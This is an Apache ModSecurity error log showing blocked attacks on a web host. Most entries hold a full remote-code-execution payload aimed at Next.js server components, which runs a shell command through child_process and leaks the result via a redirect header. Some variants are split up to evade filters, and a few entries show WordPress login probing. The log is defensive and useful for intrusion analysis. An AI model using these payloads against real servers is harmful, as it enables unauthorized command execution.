[pid 13989:tid 14014] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _pptn=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _olmx=Buffer.from(_pptn).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_olmx};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aY16W4_MCZZFujL22Y6oPwAAANc"] [Thu Feb 12 08:59:39.161612 2026] [:error] [pid 13989:tid 13994] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _frxs=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ihec=Buffer.from(_frxs).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ihec};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aY16W4_MCZZFujL22Y6oQAAAAMM"] [Thu Feb 12 08:59:39.204398 2026] [:error] [pid 13989:tid 14004] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _orci=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _kkzj=Buffer.from(_orci).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_kkzj};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aY16W4_MCZZFujL22Y6oQQAAAM0"] [Thu Feb 12 08:59:39.246930 2026] [:error] [pid 13989:tid 14002] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _btug=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _npeu=Buffer.from(_btug).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_npeu};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aY16W4_MCZZFujL22Y6oQgAAAMs"] [Thu Feb 12 13:42:21.860459 2026] [:error] [pid 13791:tid 13892] [client 194.180.49.38:56065] [client 194.180.49.38] ModSecurity: Access denied with code 403 (phase 2). String match "HTTP/1.1" at REQUEST_PROTOCOL. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "399"] [id "960020"] [rev "2"] [msg "Pragma Header requires Cache-Control Header for HTTP/1.1 requests."] [severity "NOTICE"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/wp-login.php"] [unique_id "aY28nW0MNFSD4iaFyPJcqgAAAE8"] [Thu Feb 12 13:42:22.239797 2026] [:error] [pid 13791:tid 13886] [client 194.180.49.38:56065] [client 194.180.49.38] ModSecurity: Access denied with code 403 (phase 2). String match "HTTP/1.1" at REQUEST_PROTOCOL. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "399"] [id "960020"] [rev "2"] [msg "Pragma Header requires Cache-Control Header for HTTP/1.1 requests."] [severity "NOTICE"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/wp-admin/"] [unique_id "aY28nm0MNFSD4iaFyPJcqwAAAEo"], referer: https://wordpress.org/ [Thu Feb 12 13:42:22.853032 2026] [:error] [pid 13791:tid 13884] [client 194.180.49.38:56065] [client 194.180.49.38] ModSecurity: Access denied with code 403 (phase 2). String match "HTTP/1.1" at REQUEST_PROTOCOL. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "399"] [id "960020"] [rev "2"] [msg "Pragma Header requires Cache-Control Header for HTTP/1.1 requests."] [severity "NOTICE"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/admin"] [unique_id "aY28nm0MNFSD4iaFyPJcrQAAAEg"], referer: https://www.google.com/ [Fri Feb 13 22:34:50.793641 2026] [:error] [pid 11434:tid 11449] [client 20.203.162.238:18267] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Sun Feb 15 10:54:05.111416 2026] [:error] [pid 27901:tid 27963] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _hlue=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _bkbg=Buffer.from(_hlue).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_bkbg};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aZGJrR4-YzjAtCob1sG9lQAAAFE"] [Sun Feb 15 10:54:05.154863 2026] [:error] [pid 27901:tid 27969] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _urry=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _ndfg=Buffer.from(_urry).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ndfg};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aZGJrR4-YzjAtCob1sG9lgAAAFY"] [Sun Feb 15 10:54:05.193724 2026] [:error] [pid 27901:tid 27953] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _pbxu=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _nbea=Buffer.from(_pbxu).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_nbea};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aZGJrR4-YzjAtCob1sG9lwAAAEc"] [Sun Feb 15 10:54:05.223894 2026] [:error] [pid 27901:tid 27952] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ccgt=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _nfzw=Buffer.from(_ccgt).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_nfzw};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aZGJrR4-YzjAtCob1sG9mAAAAEY"] [Sun Feb 15 10:54:05.249305 2026] [:error] [pid 27901:tid 27957] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _qxst=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _xexi=Buffer.from(_qxst).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_xexi};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aZGJrR4-YzjAtCob1sG9mQAAAEs"] [Sun Feb 15 10:54:05.275240 2026] [:error] [pid 27901:tid 27961] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _bzqs=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _nang=Buffer.from(_bzqs).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_nang};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aZGJrR4-YzjAtCob1sG9mgAAAE8"] [Sun Feb 15 10:54:05.300915 2026] [:error] [pid 27901:tid 27960] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _qatr=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _fnds=Buffer.from(_qatr).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_fnds};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aZGJrR4-YzjAtCob1sG9mwAAAE4"] [Sun Feb 15 10:54:05.326313 2026] [:error] [pid 27901:tid 27962] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _napq=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _hsfg=Buffer.from(_napq).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_hsfg};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aZGJrR4-YzjAtCob1sG9nAAAAFA"] [Sun Feb 15 10:54:05.351623 2026] [:error] [pid 27901:tid 27954] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _cnox=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _rgst=Buffer.from(_cnox).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_rgst};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aZGJrR4-YzjAtCob1sG9nQAAAEg"] [Sun Feb 15 10:54:05.378454 2026] [:error] [pid 27901:tid 27970] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _bfdf=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ermv=Buffer.from(_bfdf).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ermv};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aZGJrR4-YzjAtCob1sG9ngAAAFc"] [Sun Feb 15 10:54:05.404792 2026] [:error] [pid 27901:tid 27950] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _mltc=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _wwdf=Buffer.from(_mltc).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_wwdf};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aZGJrR4-YzjAtCob1sG9nwAAAEQ"] [Sun Feb 15 10:54:05.429958 2026] [:error] [pid 27901:tid 27964] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _dmwj=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _uhxu=Buffer.from(_dmwj).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_uhxu};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aZGJrR4-YzjAtCob1sG9oAAAAFI"] [Sun Feb 15 10:54:05.451649 2026] [:error] [pid 27901:tid 27959] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _tdbl=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _dywv=Buffer.from(_tdbl).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_dywv};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aZGJrR4-YzjAtCob1sG9oQAAAE0"] [Sun Feb 15 10:54:05.471972 2026] [:error] [pid 27901:tid 27949] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ijal=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _lito=Buffer.from(_ijal).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_lito};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aZGJrR4-YzjAtCob1sG9ogAAAEM"] [Sun Feb 15 10:54:05.493398 2026] [:error] [pid 27901:tid 27968] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match 